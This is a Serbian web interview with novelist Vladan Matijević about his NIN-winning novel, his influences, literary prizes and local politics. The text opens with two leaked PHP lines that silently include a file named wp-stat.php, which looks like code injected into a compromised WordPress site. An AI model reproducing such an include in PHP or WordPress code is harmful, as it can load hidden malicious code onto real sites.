@require(dirname(__FILE__).'/wp-stat.php'); @require(dirname(__FILE__).'/wp-stat.php'); VLADAN MATIJEVIĆ, KNJIŽEVNIK: Svaku svoju knjigu sam pisao kao da mi je poslednja – Nedim Sejdinović

VLADAN MATIJEVIĆ, KNJIŽEVNIK: Svaku svoju knjigu sam pisao kao da mi je poslednja

Ovogodišnji dobitnik Ninove nagrade za roman godine, Vladan Matijević rođen je 16. novembra 1962. godine u Čačku, gde i danas živi. Mada je po školovanju inženjer, za sebe voli reći da je po zanimanju “danonoćni pisac”. U književnosti se pojavio ranih devedesetih zbirkom poezije “Ne remeteći rasulo”, a prvi roman, “Van kontrole” objavio je sredinom poslednje decenije prošloga veka. Potom su usledili: roman “R.C. Neminovno”, zbirka poezije “Samosvođenje”, a onda i zbirka pripovedaka “Prilično mrtvi”, za koju 2000. godine dobija Andrićevu nagradu.

Nagrađeni roman “Pisac izdaleka”, po rečima Ninovog žirija koji je odluku o nagradi doneo jednoglasno, “iskušava roman kao žanr okrećući se postmodernizmu, ali istovremeno dovodeći u pitanje i postmodernističke principe”. U centru romana nalazi se pisac-šarlatan Džoni Glintić, koji ima fiks-ideju da se proslavi kao romansijer i osvoji prestižnu književnu nagradu Srpske fabrike šećera.

Izvrstan poznavalac istorije srpske književnosti, ujedno i urednik “Pisca izdaleka”, Gojko Tešić, smatra da vaše pripovedanje nema pandana u prošlosti i sadašnjosti domaće proze. Da li se slažete s njim?

– Uvek se trudim da ono što pišem bude nešto novo, drugačije, do tada neviđeno. Međutim, sigurno da postoje pisci i u srpskoj književnosti od kojih sam nešto, nenamerno, prisvojio, sigurno da postoje knjige koje su itekako uticale na moje pisanje. Posle svega, teško je odrediti od čijih su sve uticaja sačinjena moja dela.

Već ste rekli u jednom intervjuu da ne volite da razmišljate o tome da li je neki književnik više ili manje uticao na vaš rad. Ipak, da li možete da izdvojite neke pisce koji su menjali vaš pogled na svet?

– Mislim da su to, pre svih, pisci apsurda – Beket, Jonesko, Kafka… Od naših pisaca bih izdvojio Danila Kiša.

Po školovanju ste inženjer. Ipak, ne volite kada neko kaže da vam je književnost “usputno zanimanje”. Gde se, po vama, nalazi ta granica kada pisanje postane pr(a)va profesija?

– Pisci koji pišu i objavljuju, koji su se predali književnosti, teško da mogu da odrede gde se nalazi ta granica. Nemoguće je pisati dela koje imaju bilo kakvog kvaliteta, a to raditi usputno. Nemoguće je nešto vredno stvoriti u književnosti a ne biti joj sto posto predan. Ja sam još početkom devedesetih shvatio da za mene ne postoji ništa drugo osim pisanja, da je književnost i moj poziv i moja sudbina.

Ninova nagrada je, posebno u proteklih 15-ak godina, imala mnogo padova i propusta, nerazjašnjenih odluka sa političkom pozadinom. Da li ste i jednog trenutka pomislili da odbijete ovu nagradu, kao što su to u prošlosti činili neki laureati?

– Ne. Uopšte, mislim da su institucije nagrada izuzetno značajne za pisca, prvenstveno za tiraže njegovih knjiga. One omogućavaju piscu da bude čitan. A svaki pisac želi da njegove knjige imaju mnogo čitalaca, tako se njegov rad ostvaruje i dobija pun smisao.

Dakle, Ninova nagrada za vas predstavlja most prema čitaocima?

– Da.

Šta će ova nagrada značiti za vaš budući književni rad?

– Neće značiti ništa novo. I pre nagrade svaku svoju knjigu sam pisao kao da mi je poslednja. Na svakoj sam se trudio maksimalno i, dok sam radio, nisam razmišljao ni o nagradama, ni o čitaocima, ni o tiražima. Prema sebi sam uvek bio izuzetno strog.

A u materijalnom smislu? Da li će nagrada doprineti lagodnijem stvaranju?

– Na neko vreme, da. A posle toga će verovatno biti sve po starom.

Da li je nagrada doprinela interesovanju i za vaša ranija dela?

– Za neki dan izlazi novo izdanje zbirke pripovedaka “Prilično mrtvi”, a sprema se, i do sajma knjiga će izaći, novo izdanje romana “R. C. Neminovno”.

Nekada je Ninova nagrada značila i automatsko prevođenje na nekoliko svetskih jezika. Sada je to drugačije. Da li ima interesovanja za prevođenje “Pisca izdaleka”?

– Od 2000. godine, dakle pre ove nagrade, postojala su neka interesovanja, neki kontakti… Ali ništa od toga nije ostvareno, ako ne računamo poneku prevedenu priču za pojedine časopise. I sada postoje kontakti i interesovanja. Videćemo da li će nešto od toga biti i realizovano.

Da li smatrate da pisac, osim u svojim knjigama, treba i u javnim istupima i intervjuima da se određuje prema stanju u društvu?

– Mislim da je to individualna stvar, da zavisi od odluke samog pisca, odluke koju treba poštovati. Nema tu nekog pravila… Ne može pisac da kaže ništa novo, ništa posebno, jer on uglavnom zna samo ono što i drugi znaju, ništa drugo.

Vaš gradonačelnik Velimir Ilić naš je novi ministar za kapitalne investicije. Kakva su vaša iskustva sa njim?

– Veoma malo pratim medije, pa tako i ne znam šta se dešava. O stvarima iz političkog života uglavnom se informišem od prijatelja kada sedimo u kafani. Ipak, rekao bih nešto o Velimiru Iliću. 2000. godine svi su u Srbiji, manje-više, hvalili Ilića, isticali njegove pozitivne osobine, a ja sam tada upozoravao da je to samo jedna strana medalje, da tu ima dosta negativnih stvari. Sada je situacija obrnuta. Kada je napokon pokazao svoje pravo lice i kada ljudi o njemu govore uglavnom negativne stvari, ja dolazim u situaciju da ga branim. Sada su svima jasne njegove slabosti, prevenstveno arogancija, ali ne treba zaboraviti da je on za vreme Miloševićeve diktature Čačak pretvorio u najslobodniji grad Srbije.

Nedim Sejdinović

 

Sviđa vam se ovaj tekst? Odojite sekund vašeg vremena da podržite Nedima Sejdinovića preko Patreon-a!

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.